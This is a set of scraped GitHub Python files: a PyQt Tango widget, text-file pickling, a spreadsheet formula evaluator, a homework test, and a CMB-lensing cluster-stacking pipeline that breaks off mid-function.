+{"seq_id":"14609929524","text":"# coding: utf-8\n\"\"\"\nCreated on Jan 3, 2020\n\n@author: sanin\n\"\"\"\nimport sys\nimport time\n\nfrom PyQt5.QtWidgets import QComboBox\n\nfrom TangoWidgets.TangoWriteWidget import TangoWriteWidget\nfrom TangoWidgets.TangoWidget import TangoWidget\n\n\nclass TangoComboBox(TangoWriteWidget):\n    def __init__(self, name, widget: QComboBox, readonly=False):\n        super().__init__(name, widget)\n        self.widget.currentIndexChanged.connect(self.callback)\n\n    def decorate_error(self):\n        self.widget.setStyleSheet('color: red')\n\n    def update(self, decorate_only=False):\n        super().update(decorate_only)\n\n    def set_widget_value(self):\n        #bs = self.widget.blockSignals(True)\n        try:\n            self.widget.setCurrentIndex(int(self.attribute.value()))\n        except:\n            pass\n        #self.widget.blockSignals(bs)\n        return self.attribute.value()\n\n    def compare(self):\n        try:\n            return int(self.attribute.value()) == self.widget.currentIndex()\n        except:\n            self.logger.debug('Exception in ComboBox compare', exc_info=True)\n            return False\n\n    def callback(self, value):\n        if self.attribute.connected:\n            try:\n                self.write(int(value))\n                self.decorate_valid()\n            except:\n                self.logger.debug('Exception %s in callback', sys.exc_info()[1])\n                self.decorate_error()\n        else:\n            self.attribute.reconnect()\n            self.decorate_error()\n","repo_name":"smertouh/1_MeV_UI_additional","sub_path":"TangoWidgets/TangoComboBox.py","file_name":"TangoComboBox.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40856684671","text":"import os\n\nprint(os.getcwd())\ntxt_data = 'Chapter08/txt_data/'\n\nsub_dir = os.listdir(txt_data)\nprint(sub_dir)\n\ndef textPro(sub_dir):\n    first_txt = []\n    second_txt = []\n\n    for sdir in sub_dir :\n        dirname = txt_data + sdir\n        file_list = os.listdir(dirname)\n\n        for fname in file_list:\n            file_path = dirname + '/' + fname\n\n            if os.path.isfile(file_path) :\n                try :\n\n                    file = open(file_path, 'r')\n                    if sdir == 'first' :\n                        first_txt.append(file.read())\n                    else :\n                        second_txt.append(file.read())\n                except Exception as e:\n                    print('Exception occurred:', e)\n                finally:\n                    file.close()\n    return first_txt, second_txt\n\nimport pickle\n\n# Build the combined list before pickling; the original dumped tot_texts\n# without ever defining it or calling textPro.\nfirst_txt, second_txt = textPro(sub_dir)\ntot_texts = first_txt + second_txt\n\npfile_w = open('Chapter08/data/tot_texts.pck', mode='wb')\npickle.dump(tot_texts, pfile_w)\n\npfile_r = open('Chapter08/data/tot_texts.pck', mode='rb')\ntot_texts_read = pickle.load(pfile_r)\nprint('tot_texts length =', len(tot_texts_read))\n\nprint(type(tot_texts_read))\nprint(tot_texts_read)","repo_name":"hiyeji/git_head","sub_path":"workspace/Chapter08/lecture/step04_text_process.py","file_name":"step04_text_process.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"34945632879","text":"from typing import Dict\nimport re\n\n\nclass Spreadsheet:\n    def __init__(self):\n        self.cells: Dict[str, object] = {}\n        self.supported_operations = ['+', '-']\n\n    def set_cell_value(self, cell_id: str, value: object) -> None:\n        \"\"\"\n        Sets the value of a cell in the spreadsheet.\n\n        Parameters:\n        cell_id (str): The ID of the cell to set the value for.\n        value (object): The value to set for the cell.\n\n        Returns:\n        None\n\n        Raises:\n        
ValueError: If the value contains unsupported operators or references undefined cells.\n \"\"\"\n if isinstance(value, str) and value.startswith('='):\n operators = re.findall(r'[+\\-*/]', value)\n unsupported_operators = [operator for operator in operators if operator not in self.supported_operations]\n if unsupported_operators:\n raise ValueError(f\"Unsupported operators {unsupported_operators} found\")\n\n referenced_cells = re.findall(r'[A-Z]+\\d+', value)\n undefined_cells = [cell_reference for cell_reference in referenced_cells if cell_reference not in self.cells]\n if undefined_cells:\n raise ValueError(f\"Referenced cells {undefined_cells} are not defined\")\n\n self.cells[cell_id] = value\n\n def get_cell_value(self, cell_id: str) -> object:\n \"\"\"\n Get the value of a cell from the dictionary.\n\n Args:\n cell_id (str): The ID of the cell.\n\n Returns:\n object: The value of the cell.\n\n Raises:\n ValueError: If the cell is not found.\n \"\"\"\n \n if cell_id not in self.cells:\n raise ValueError(\"Cell not found\")\n \n value = self.cells[cell_id]\n if isinstance(value, str) and value.startswith('='):\n value = self.evaluate_expression(value[1:])\n return value\n\n def evaluate_expression(self, expression: str) -> object:\n \"\"\"\n Evaluate a mathematical expression and return the result.\n\n Args:\n expression (str): The mathematical expression to evaluate.\n\n Returns:\n object: The result of the evaluation.\n\n Raises:\n ValueError: If the expression contains an unsupported or invalid token,\n or if the expression is invalid.\n \"\"\"\n operators = self.supported_operations\n tokens = re.findall(r'[A-Z]+\\d+|[+\\-()]|\\d+\\.\\d+|\\d+', expression)\n stack = []\n\n def perform_operation(op, op1, op2):\n \"\"\"\n Perform a mathematical operation on two operands.\n\n Args:\n op (str): The operator to perform.\n op1 (float): The first operand.\n op2 (float): The second operand.\n\n Returns:\n float: The result of the operation.\n \"\"\"\n if op == '+':\n return op1 + op2\n elif op == '-':\n return op1 - op2\n else:\n raise ValueError(\"Unsupported operation\")\n\n for token in tokens:\n if token in operators:\n while stack and stack[-1] in operators:\n if len(stack) < 3:\n raise ValueError(\"Unsupported or invalid token\")\n op2, op, op1 = stack.pop(), stack.pop(), stack.pop()\n stack.append(perform_operation(op, op1, op2))\n stack.append(token)\n elif token.isdigit() or (token[0] == '-' and token[1:].isdigit()):\n stack.append(float(token))\n elif token in self.cells:\n stack.append(self.get_cell_value(token))\n else:\n raise ValueError(\"Unsupported or invalid token\")\n\n while len(stack) > 1:\n if len(stack) < 3:\n raise ValueError(\"Unsupported or invalid token\")\n op2, op, op1 = stack.pop(), stack.pop(), stack.pop()\n stack.append(perform_operation(op, op1, op2))\n\n if len(stack) != 1:\n raise ValueError(\"Invalid expression\")\n\n return stack[0]\n","repo_name":"jojoe-ainoo/spreadsheet-sdk","sub_path":"spreadsheet-package/spreadsheet/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8632924505","text":"# Tests for HW3\r\n# Prime Number Checker\r\n\r\nimport os.path\r\nimport sys\r\nfrom HW3 import main\r\nfrom tud_tests import *\r\n\r\ndef test_HW3():\r\n\r\n try:\r\n exists = os.path.exists(\"HW3.py\")\r\n assert exists == True\r\n except:\r\n sys.exit()\r\n\r\n # Test 1\r\n 
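# Illustrative sketch (not part of the original records): exercising the
# Spreadsheet class defined above. Only '+' and '-' are supported, and
# evaluate_expression reduces its stack from the right, so mixed chains
# associate as A1 - (B1 + B1) rather than (A1 - B1) + B1.
sheet = Spreadsheet()
sheet.set_cell_value("A1", 10)
sheet.set_cell_value("B1", 4)
sheet.set_cell_value("C1", "=A1-B1")
print(sheet.get_cell_value("C1"))   # 6
sheet.set_cell_value("D1", "=A1-B1+B1")
print(sheet.get_cell_value("D1"))   # 2, not 10, because of the right-to-left reduction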
set_keyboard_input([25,\"y\",101,\"Y\",10013,\"y\",1013,\"y\",\"red\",53,\"n\"])\r\n main()\r\n output = get_display_output()\r\n\r\n assert output == [\r\n \"Prime Number Checker\",\r\n \"\\nEnter an integer to test: \",\r\n \"25 is a composite number because it is divisible by 5\",\r\n \"Do you want to test another integer (y/n): \",\r\n \"\\nEnter an integer to test: \",\r\n \"101 is a prime number\",\r\n \"Do you want to test another integer (y/n): \",\r\n \"\\nEnter an integer to test: \",\r\n \"10013 is a composite number because it is divisible by 17\",\r\n \"Do you want to test another integer (y/n): \",\r\n \"\\nEnter an integer to test: \",\r\n \"1013 is a prime number\",\r\n \"Do you want to test another integer (y/n): \",\r\n \"\\nEnter an integer to test: \",\r\n \"Invalid integer value! Try again\",\r\n \"\\nEnter an integer to test: \",\r\n \"53 is a prime number\",\r\n \"Do you want to test another integer (y/n): \",\r\n \"\\nBye!\"\r\n ]","repo_name":"brmcbrid/CSC_122_HW3","sub_path":"test_HW3.py","file_name":"test_HW3.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26325167359","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 19 10:37 2020\n\n@author: fdbfvuie\n\"\"\"\n\ninput()\na = input().split()\nfor i in range(len(a)):\n a[i] = int(a[i][::-1])\na.sort()\nprint(a[-1])","repo_name":"fjfhfjfjgishbrk/AE401-Python","sub_path":"zerojudge/c561.py","file_name":"c561.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40222896401","text":"from __future__ import print_function\nfrom orphics import maps,io,cosmology,stats,catalogs,lensing\nfrom orphics.mpi import MPI\nfrom pixell import enmap,wcsutils,utils as putils,bunch\nimport numpy as np\nimport os,sys,re\nimport warnings\nfrom astropy.io import fits\nfrom enlib import bench\nimport argparse\nimport time\n\nfrom HMFunc.cosmology import Cosmology\n\ntry:\n paths = bunch.Bunch(io.config_from_yaml(\"input/paths_local.yml\"))\nexcept:\n print(\"No paths_local.yml file found. Please copy paths.yml to paths_local.yml and edit with your local paths. Do not add the latter file to the git tree.\")\n raise\n\ndefaults = bunch.Bunch(io.config_from_yaml(\"input/defaults.yml\"))\ndata_choice = bunch.Bunch(io.config_from_yaml(\"input/data.yml\"))\n\ndef initialize_pipeline_config():\n start_time = time.time()\n d = defaults\n tags = bunch.Bunch({})\n\n # Parse command line\n parser = argparse.ArgumentParser(description=\"Stacked CMB lensing.\")\n parser.add_argument(\"version\", type=str, help=\"Version label.\")\n parser.add_argument(\n \"cat_type\", type=str, help=\"Catalog path relative to data directory.\"\n )\n parser.add_argument(\n \"-N\",\n \"--nmax\",\n type=int,\n default=None,\n help=\"Limit number of objects used e.g. 
for debugging or quick tests, or for sim injections.\",\n )\n parser.add_argument(\n \"--grad-lmin\", type=int, default=d.gradient_lmin, help=\"Minimum multipole for Planck.\"\n )\n parser.add_argument(\n \"--grad-lmax\", type=int, default=d.gradient_lmax, help=\"Maximum multipole for Planck.\"\n )\n parser.add_argument(\n \"--hres-lmin\", type=int, default=None, help=\"Minimum multipole for ACT.\"\n )\n parser.add_argument(\n \"--hres-lmax\", type=int, default=d.highres_lmax, help=\"Maximum multipole for ACT.\"\n )\n parser.add_argument(\n \"--klmin\", type=int, default=d.kappa_Lmin, help=\"Minimum multipole for recon.\"\n )\n parser.add_argument(\n \"--klmax\", type=int, default=d.kappa_Lmax, help=\"Maximum multipole for recon.\"\n )\n parser.add_argument(\n \"--hres-lxcut\", type=int, default=None, help=\"Lxcut for ACT.\"\n )\n parser.add_argument(\n \"--hres-lycut\", type=int, default=None, help=\"Lycut for ACT.\"\n )\n parser.add_argument(\n \"--zmin\", type=float, default=None, help=\"Minimum redshift.\"\n )\n parser.add_argument(\n \"--zmax\", type=float, default=None, help=\"Maximum redshift.\"\n )\n parser.add_argument(\n \"--snmin\", type=float, default=None, help=\"Minimum SNR.\"\n )\n parser.add_argument(\n \"--snmax\", type=float, default=None, help=\"Maximum SNR.\"\n )\n parser.add_argument(\n \"--y0min\", type=float, default=None, help=\"Minimum y0.\"\n )\n parser.add_argument(\n \"--y0max\", type=float, default=None, help=\"Maximum y0.\"\n )\n parser.add_argument(\n \"--full-sim-index\", \n type=int, \n default=None, \n help=\"Use full-sky CMB simulations with this index. Defaults to None.\"\n )\n parser.add_argument(\n \"--ilc-lmin\", type=int, default=d.ilc_lmin, help=\"Minimum ell for ILC solution.\"\n )\n parser.add_argument(\n \"--ilc-lmax\", type=int, default=d.ilc_lmax, help=\"Maxmimum ell for ILC solution.\"\n )\n parser.add_argument(\n \"--arcmax\", type=float, default=d.arcmax, help=\"Maximum arcmin distance for binning.\"\n )\n parser.add_argument(\n \"--arcstep\", type=float, default=d.arcstep, help=\"Step arcmin for binning.\"\n )\n parser.add_argument(\n \"--max-rms\",\n type=float,\n default=d.max_rms_noise,\n help=\"Maximum RMS noise in uK-arcmin, beyond which to reject stamps.\",\n )\n parser.add_argument(\n \"--swidth\", type=float, default=d.stamp_width_arcmin, help=\"Stamp width arcmin.\"\n )\n parser.add_argument(\n \"--pwidth\", type=float, default=d.pix_width_arcmin, help=\"Pixel width arcmin.\"\n )\n parser.add_argument(\n \"--no-fit-noise\",\n action=\"store_true\",\n help=\"If True, do not fit empirical noise, but use RMS values specified in defaults.yml.\",\n )\n parser.add_argument(\n \"--day-null\",\n action=\"store_true\",\n help=\"Use day-night as data.\",\n )\n parser.add_argument(\n \"--tap-per\", type=float, default=d.taper_percent, help=\"Taper percentage.\"\n )\n parser.add_argument(\n \"--pad-per\", type=float, default=d.pad_percent, help=\"Pad percentage.\"\n )\n parser.add_argument(\n \"--debug-fit\", type=str, default=None, help=\"Which fit to debug.\"\n )\n parser.add_argument(\n \"--debug-anomalies\",\n action=\"store_true\",\n help=\"Whether to save plots of excluded anomalous stamps.\",\n )\n parser.add_argument(\n \"--debug-powers\",\n action=\"store_true\",\n help=\"Whether to plot various power spectra from each stamp.\",\n )\n parser.add_argument(\n \"--debug-nl\",\n action=\"store_true\",\n help=\"Whether to plot Nl for weighting and stop after one cluster.\",\n )\n parser.add_argument(\n \"--no-90\", action=\"store_true\", 
help=\"Do not use the 90 GHz map.\"\n )\n parser.add_argument(\n \"--inpaint\", action=\"store_true\", help=\"Inpaint gradient.\"\n )\n parser.add_argument(\n \"--no-sz-sub\",\n action=\"store_true\",\n help=\"Use the high-res maps without SZ subtraction.\",\n )\n parser.add_argument(\n \"--s19\",\n action=\"store_true\",\n help=\"Use preliminary 2019 data.\",\n )\n parser.add_argument(\n \"--curl\",\n action=\"store_true\",\n help=\"Do curl null test instead of lensing.\",\n )\n parser.add_argument(\n \"--inject-sim\",\n action=\"store_true\",\n help=\"Instead of using data, simulate a lensing cluster and Planck+ACT (or unlensed for mean-field).\",\n )\n parser.add_argument(\n \"--lensed-sim-version\",\n type=str,\n default=d.lensed_sim_version,\n help=\"Default lensed sims to inject.\",\n )\n parser.add_argument(\n \"-o\", \"--overwrite\", action=\"store_true\", help=\"Overwrite existing version.\"\n )\n parser.add_argument(\n \"--is-meanfield\", action=\"store_true\", help=\"This is a mean-field run.\"\n )\n parser.add_argument(\n \"--debug-stack\", action=\"store_true\", help=\"Skip reconstruction and just stack on gradient and high-res.\"\n )\n parser.add_argument(\n \"--bcg\", action=\"store_true\", help=\"Use BCGs for Hilton Catalog.\"\n )\n parser.add_argument(\n \"--rand-rot\", action=\"store_true\", help=\"Rotate high-res stamp by random number of 90 degrees as a null test.\"\n )\n parser.add_argument(\n \"--night-only\", action=\"store_true\", help=\"Use night-only maps.\"\n )\n parser.add_argument(\n \"--full-nl\", action=\"store_true\", help=\"Do not assume estimator is optimal for Nl weighting.\"\n )\n parser.add_argument(\n \"--act-only-in-hres\",\n action=\"store_true\",\n help=\"Use ACT only maps in high-res instead of ACT+Planck.\",\n )\n parser.add_argument(\n \"--save-power\", action=\"store_true\", help=\"Save power spectrum of each stamp.\"\n )\n parser.add_argument(\n \"--no-150\", action=\"store_true\", help=\"Do not use the 150 GHz map.\"\n )\n parser.add_argument(\n \"--freq-null\", action=\"store_true\", help=\"Use 90-150 GHz for high-res.\"\n )\n parser.add_argument(\n \"--no-filter\", \n action=\"store_true\", \n help=\"Remove filters and stack without lensing reconstruction (use with --debug-stack)\"\n )\n parser.add_argument(\n \"--hres-grad\", \n action=\"store_true\", \n help=\"Replace tSZ-free gradient with high-res co-adds (may want to use with --inpaint)\"\n )\n parser.add_argument(\n \"--grad-noszsub\", \n action=\"store_true\", \n help=\"No SZ model image subtraction when replacing tSZ-free gradient with high-res co-adds (use with --hres-grad)\"\n )\n parser.add_argument(\n \"--decmin\", type=float, default=None, help=\"Minimum declination in degree.\"\n )\n args = parser.parse_args()\n\n if args.hres_lmin is None:\n if args.act_only_in_hres:\n setattr(args, 'hres_lmin', d.conservative_highres_lmin)\n else:\n setattr(args, 'hres_lmin', d.aggressive_highres_lmin)\n\n if args.hres_lycut is None:\n if args.act_only_in_hres:\n setattr(args, 'hres_lycut', d.conservative_highres_lycut)\n else:\n setattr(args, 'hres_lycut', d.aggressive_highres_lycut)\n\n if args.hres_lxcut is None:\n if args.act_only_in_hres:\n setattr(args, 'hres_lxcut', d.conservative_highres_lxcut)\n else:\n setattr(args, 'hres_lxcut', d.aggressive_highres_lxcut)\n\n\n \"\"\"\n We will save results to a directory in paths.yml:scratch.\n To decide on the name and to ensure that any meanfields we make\n have identical noise properties, we build some strings:\n \"\"\"\n\n tags.dstr = 
\"night\" if args.night_only else \"daynight\"\n tags.apstr = \"act\" if args.act_only_in_hres else \"act_planck\"\n tags.mstr = \"_meanfield\" if args.is_meanfield else \"\"\n tags.n90str = \"_no90\" if args.no_90 else \"\"\n tags.s19str = \"s19\" if args.s19 else \"s18\" \n curlstr = \"_curl\" if args.curl else \"\"\n findstr = f\"_{args.full_sim_index:06d}\" if not(args.full_sim_index is None) else \"\"\n if not(args.full_sim_index is None):\n assert args.night_only and not(args.act_only_in_hres), \"Full sims only currently for night-only act_planck\"\n\n # The directory name string\n vstr = f\"{args.version}_{args.cat_type}_plmin_{args.grad_lmin}_plmax_{args.grad_lmax}_almin_{args.hres_lmin}_almax_{args.hres_lmax}_klmin_{args.klmin}_klmax_{args.klmax}_lxcut_{args.hres_lxcut}_lycut_{args.hres_lycut}_swidth_{args.swidth:.2f}_tapper_{args.tap_per:.2f}_padper_{args.pad_per:.2f}_{tags.dstr}_{tags.apstr}{tags.n90str}_{tags.s19str}{curlstr}{tags.mstr}{findstr}\"\n\n\n # File save paths\n savedir = paths.scratch + f\"/{vstr}/\"\n debugdir = paths.scratch + f\"/{vstr}/debug/\"\n\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n\n overwrite = args.overwrite\n if not (overwrite):\n assert not (\n os.path.exists(savedir)\n ), \"This version already exists on disk. Please use a different version identifier or use the overwrite argument.\"\n if rank == 0:\n try:\n os.makedirs(savedir)\n except:\n if overwrite:\n pass\n else:\n raise\n try:\n os.makedirs(debugdir)\n except:\n if overwrite:\n pass\n else:\n raise\n comm.Barrier() # Wait for other processes to catch up with rank=0 before saving to these directories\n\n paths.debugdir = debugdir\n paths.savedir = savedir\n return start_time,paths,defaults,args,tags,rank,data_choice\n\ndef cut_z_sn(ras,decs,sns,zs,zmin,zmax,snmin,snmax,y0s,y0min,y0max,decmin,mass):\n if zmin is not None:\n ras = ras[zs>zmin]\n decs = decs[zs>zmin]\n sns = sns[zs>zmin]\n y0s = y0s[zs>zmin]\n mass = mass[zs>zmin]\n zs = zs[zs>zmin]\n if zmax is not None:\n ras = ras[zs<=zmax]\n decs = decs[zs<=zmax]\n sns = sns[zs<=zmax]\n y0s = y0s[zs<=zmax]\n mass = mass[zs<=zmax]\n zs = zs[zs<=zmax]\n if snmin is not None:\n ras = ras[sns>snmin]\n decs = decs[sns>snmin]\n zs = zs[sns>snmin]\n y0s = y0s[sns>snmin]\n mass = mass[sns>snmin]\n sns = sns[sns>snmin]\n if snmax is not None:\n ras = ras[sns<=snmax]\n decs = decs[sns<=snmax]\n zs = zs[sns<=snmax]\n y0s = y0s[sns<=snmax]\n mass = mass[sns<=snmax]\n sns = sns[sns<=snmax]\n if y0min is not None:\n ras = ras[y0s>y0min]\n decs = decs[y0s>y0min]\n zs = zs[y0s>y0min]\n sns = sns[y0s>y0min]\n mass = mass[y0s>y0min]\n y0s = y0s[y0s>y0min]\n if y0max is not None:\n ras = ras[y0s<=y0max]\n decs = decs[y0s<=y0max]\n zs = zs[y0s<=y0max]\n sns = sns[y0s<=y0max]\n mass = mass[y0s<=y0max]\n y0s = y0s[y0s<=y0max]\n if decmin is not None:\n ras = ras[np.abs(decs)<=decmin]\n zs = zs[np.abs(decs)<=decmin]\n y0s = y0s[np.abs(decs)<=decmin]\n sns = sns[np.abs(decs)<=decmin] \n mass = mass[np.abs(decs)<=decmin] \n decs = decs[np.abs(decs)<=decmin] \n return ras,decs,sns,zs,y0s,mass\n\ndef catalog_interface(cat_type,is_meanfield,nmax=None,zmin=None,zmax=None,bcg=False,snmin=None,snmax=None,y0min=None,y0max=None,decmin=None):\n data = {}\n if cat_type=='hilton_dr5':\n if is_meanfield:\n #catalogue_name = paths.data+ 'selection/S18d_202003Mocks_DESSNR6Scaling/mockCatalog_combined.fits'\n catalogue_name = paths.data+ 'mocks_S18d_202006_DESSNR6Scaling/mockCatalog_combined.fits'\n else:\n #catalogue_name = paths.data+ 'AdvACT_S18Clusters_v1.0-beta.fits'\n 
#catalogue_name = paths.data+ 'AdvACT_unconfirmed_fixedSNR5p5.fits' \n catalogue_name = paths.data+ 'DR5_cluster-catalog_v1.0b2.fits' # DR5 baseline\n\n hdu = fits.open(catalogue_name)\n if bcg:\n ras = hdu[1].data['opt_RADeg']\n decs = hdu[1].data['opt_DECDeg']\n decs = decs[ras>=0]\n zs = hdu[1].data['redshift'][ras>=0]\n sns = hdu[1].data['SNR'][ras>=0]\n y0s = hdu[1].data['fixed_y_c'][ras>=0]\n mass = hdu[1].data['M500'][ras>=0]\n ras = ras[ras>=0]\n else:\n ras = hdu[1].data['RADeg']\n decs = hdu[1].data['DECDeg']\n zs = hdu[1].data['redshift']\n sns = hdu[1].data['SNR' if not (is_meanfield) else 'fixed_SNR']\n y0s = hdu[1].data['fixed_y_c']\n mass = hdu[1].data['M500' if not (is_meanfield) else 'true_M500']\n\n ras,decs,sns,zs,y0s,mass = cut_z_sn(ras,decs,sns,zs,zmin,zmax,snmin,snmax,y0s,y0min,y0max,decmin,mass)\n ras = ras[:nmax]\n decs = decs[:nmax]\n y0s = y0s[:nmax]\n zs = zs[:nmax]\n sns = sns[:nmax]\n mass = mass[:nmax]\n ws = ras*0 + 1\n data['sns'] = sns\n data['mass'] = mass\n data['y0s'] = y0s\n\n elif cat_type=='hilton_dr6':\n\n if is_meanfield:\n catalogue_name = paths.data+ 'mocks_S18d_202006_DESSNR6Scaling/mockCatalog_combined.fits' # needs mock for DR6, this is DR5 mock\n else:\n catalogue_name = paths.cat_data+ 'dr6-3freq-multipass-20220404/dr6-3freq-multipass_mass.fits' # corresponds to DR6 coadd\n\n hdu = fits.open(catalogue_name)\n ras = hdu[1].data['RADeg']\n decs = hdu[1].data['DECDeg']\n zs = hdu[1].data['redshift']\n sns = hdu[1].data['SNR' if not (is_meanfield) else 'fixed_SNR']\n y0s = hdu[1].data['fixed_y_c']\n mass = hdu[1].data['M500c' if not (is_meanfield) else 'true_M500']\n\n ras,decs,sns,zs,y0s,mass = cut_z_sn(ras,decs,sns,zs,zmin,zmax,snmin,snmax,y0s,y0min,y0max,decmin,mass)\n ras = ras[:nmax]\n decs = decs[:nmax]\n y0s = y0s[:nmax]\n zs = zs[:nmax]\n sns = sns[:nmax]\n mass = mass[:nmax]\n ws = ras*0 + 1\n data['sns'] = sns\n data['mass'] = mass\n data['y0s'] = y0s \n\n elif cat_type=='hilton_dr6_simple':\n\n if is_meanfield:\n catalogue_name = paths.data+ 'mocks_S18d_202006_DESSNR6Scaling/mockCatalog_combined.fits' # needs mock for DR6, this is DR5 mock\n else:\n catalogue_name = paths.data+ '20230721/catalogs/s08s21-3freq-flagdust-multipass-extended_mass.fits' # corresponds to DR6 coadd simple\n \n hdu = fits.open(catalogue_name)\n ras = hdu[1].data['RADeg']\n decs = hdu[1].data['DECDeg']\n zs = hdu[1].data['redshift']\n sns = hdu[1].data['SNR' if not (is_meanfield) else 'fixed_SNR']\n y0s = hdu[1].data['fixed_y_c']\n mass = hdu[1].data['M500c' if not (is_meanfield) else 'true_M500']\n\n ras,decs,sns,zs,y0s,mass = cut_z_sn(ras,decs,sns,zs,zmin,zmax,snmin,snmax,y0s,y0min,y0max,decmin,mass)\n ras = ras[:nmax]\n decs = decs[:nmax]\n y0s = y0s[:nmax]\n zs = zs[:nmax]\n sns = sns[:nmax]\n mass = mass[:nmax]\n ws = ras*0 + 1\n data['sns'] = sns\n data['mass'] = mass\n data['y0s'] = y0s \n \n elif cat_type=='planck_union':\n\n if is_meanfield:\n # made using mapcat.py followed by randcat.py\n catalogue_name = paths.data+ 'placnk_union_randoms.txt'\n ras, decs = np.loadtxt(catalogue_name, unpack=True)\n zs = ras*0 \n mass = ras*0 \n\n else:\n catalogue_name = paths.data+ 'SZ-union_R2.08.fits'\n hdu = fits.open(catalogue_name)\n ras = hdu[1].data['RA']\n decs = hdu[1].data['DEC']\n zs = hdu[1].data['REDSHIFT']\n mass = hdu[1].data['MSZ']\n\n ras = ras[zs >= 0.2]\n decs = decs[zs >= 0.2] \n mass = mass[zs >= 0.2]\n zs = zs[zs >= 0.2]\n \n ras = ras[:nmax]\n decs = decs[:nmax]\n zs = zs[:nmax]\n mass = mass[:nmax]\n ws = ras*0 + 1\n data['mass'] = mass\n\n\n 
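# Illustrative sketch (not part of the original records): the catalog branches
# above and below all read FITS columns the same way; a context manager also
# closes the file handle, which the bare fits.open calls never do. The
# filename is a placeholder.
from astropy.io import fits

with fits.open("catalog.fits") as hdu:
    ras = hdu[1].data["RA"]
    decs = hdu[1].data["DEC"]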
elif cat_type=='spt_union':\n\n if is_meanfield:\n # made using mapcat.py followed by randcat.py\n catalogue_name = paths.data+ 'spt_union_randoms.txt'\n ras, decs = np.loadtxt(catalogue_name,unpack=True)\n zs = ras*0 \n\n else:\n # SPTSZ 2019 catalogue\n catalogue_name = paths.data+ 'sptsz2500d_cluster_sample_Bocquet19.fits'\n hdu = fits.open(catalogue_name)\n ras0 = hdu[1].data['RA']\n decs0 = hdu[1].data['DEC']\n zs0 = hdu[1].data['REDSHIFT'] \n\n # SPTECS 2019 catalogue\n catalogue_name = paths.data+ 'sptecs_catalog_oct919.fits'\n hdu = fits.open(catalogue_name)\n ras1 = hdu[1].data['RA']\n decs1 = hdu[1].data['DEC']\n zs1 = hdu[1].data['REDSHIFT']\n\n # SPTPol 2019 catalogue \n catalogue_name = paths.data+ 'sptpol100d_catalog_huang19.fits'\n hdu = fits.open(catalogue_name)\n ras2 = hdu[1].data['RA']\n decs2 = hdu[1].data['Dec']\n zs2 = hdu[1].data['redshift'] \n\n ras = np.concatenate((ras0, ras1, ras2)) \n decs = np.concatenate((decs0, decs1, decs2)) \n zs = np.concatenate((zs0, zs1, zs2)) \n\n ras = ras[zs > 0]\n decs = decs[zs > 0] \n zs = zs[zs > 0] \n \n ras = ras[:nmax]\n decs = decs[:nmax]\n zs = zs[:nmax]\n ws = ras*0 + 1\n\n elif cat_type=='sdss_redmapper':\n if is_meanfield:\n catalogue_name = paths.data+ 'redmapper_dr8_public_v6.3_randoms.fits'\n else:\n catalogue_name = paths.data+ 'redmapper_dr8_public_v6.3_catalog.fits'\n hdu = fits.open(catalogue_name)\n ras = hdu[1].data['RA']\n decs = hdu[1].data['DEC']\n zs = hdu[1].data['Z_LAMBDA' if not(is_meanfield) else 'Z']\n lams = hdu[1].data['LAMBDA']\n ras = ras[decs<25]\n zs = zs[decs<25]\n lams = lams[decs<25]\n decs = decs[decs<25]\n ras = ras[:nmax]\n decs = decs[:nmax]\n zs = zs[:nmax]\n lams = lams[:nmax]\n ws = ras*0 + 1\n data['lams'] = lams\n\n elif cat_type=='des_redmapper':\n if is_meanfield:\n catalogue_name = paths.data+ 'y3_gold_2.2.1_wide_sofcol_run_redmapper_v6.4.22_randcat_z0.10-0.95_lgt020_vl02.fit'\n else:\n catalogue_name = paths.data+ 'y3_gold_2.2.1_wide_sofcol_run_redmapper_v6.4.22_lgt20_vl02_catalog.fit'\n hdu = fits.open(catalogue_name)\n ras = hdu[1].data['RA']\n decs = hdu[1].data['DEC']\n zs = hdu[1].data['Z_LAMBDA' if not(is_meanfield) else 'ZTRUE']\n sns = hdu[1].data['LAMBDA_CHISQ' if not(is_meanfield) else 'LAMBDA_IN']\n\n ras,decs,sns,zs = cut_z_sn(ras,decs,sns,zs,zmin,zmax,snmin,snmax)\n\n ras = ras[:nmax]\n decs = decs[:nmax]\n zs = zs[:nmax]\n sns = sns[:nmax]\n ws = ras*0 + 1\n data['lams'] = sns\n\n elif cat_type[:5]=='cmass':\n scat = cat_type.split('_')\n if len(scat)==1: raise ValueError(\"Please specify CMASS catalog as cmass_dr11 or cmass_dr12.\")\n dr = scat[1].lower()\n if dr=='dr11':\n broot = paths.boss_dr11_data\n fstr = 'DR11v1'\n elif dr=='dr12':\n broot = paths.boss_dr12_data\n fstr = 'DR12v5'\n if is_meanfield:\n # One random has 50x, more than enough for mean-fields.\n boss_files = [broot+x for x in [f'random0_{fstr}_CMASS_North.fits',f'random0_{fstr}_CMASS_South.fits']]\n else:\n boss_files = [broot+x for x in [f'galaxy_{fstr}_CMASS_North.fits',f'galaxy_{fstr}_CMASS_South.fits']]\n if zmin is None: zmin = 0.43\n if zmax is None: zmax = 0.70\n ras,decs,ws,zs = catalogs.load_boss(boss_files,zmin=zmin,zmax=zmax,do_weights=not(is_meanfield),sys_weights=False)\n if ws is None: ws = ras*0 + 1\n ws = ws[decs<25]\n ras = ras[decs<25]\n zs = zs[decs<25]\n decs = decs[decs<25]\n if nmax is not None:\n \"\"\"\n We have to be a bit more careful when a max number of random galaxies is requested for BOSS, because\n there is a North/South split.\n \"\"\"\n Ntot = len(ras)\n 
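# Illustrative sketch (not part of the original records): the fixed-seed
# subsampling used for the BOSS randoms below, rewritten with the numpy
# Generator API so the draw is reproducible without touching global state.
import numpy as np

def subsample(arrays, nmax, seed=100):
    rng = np.random.default_rng(seed)
    inds = rng.choice(len(arrays[0]), size=nmax, replace=False)
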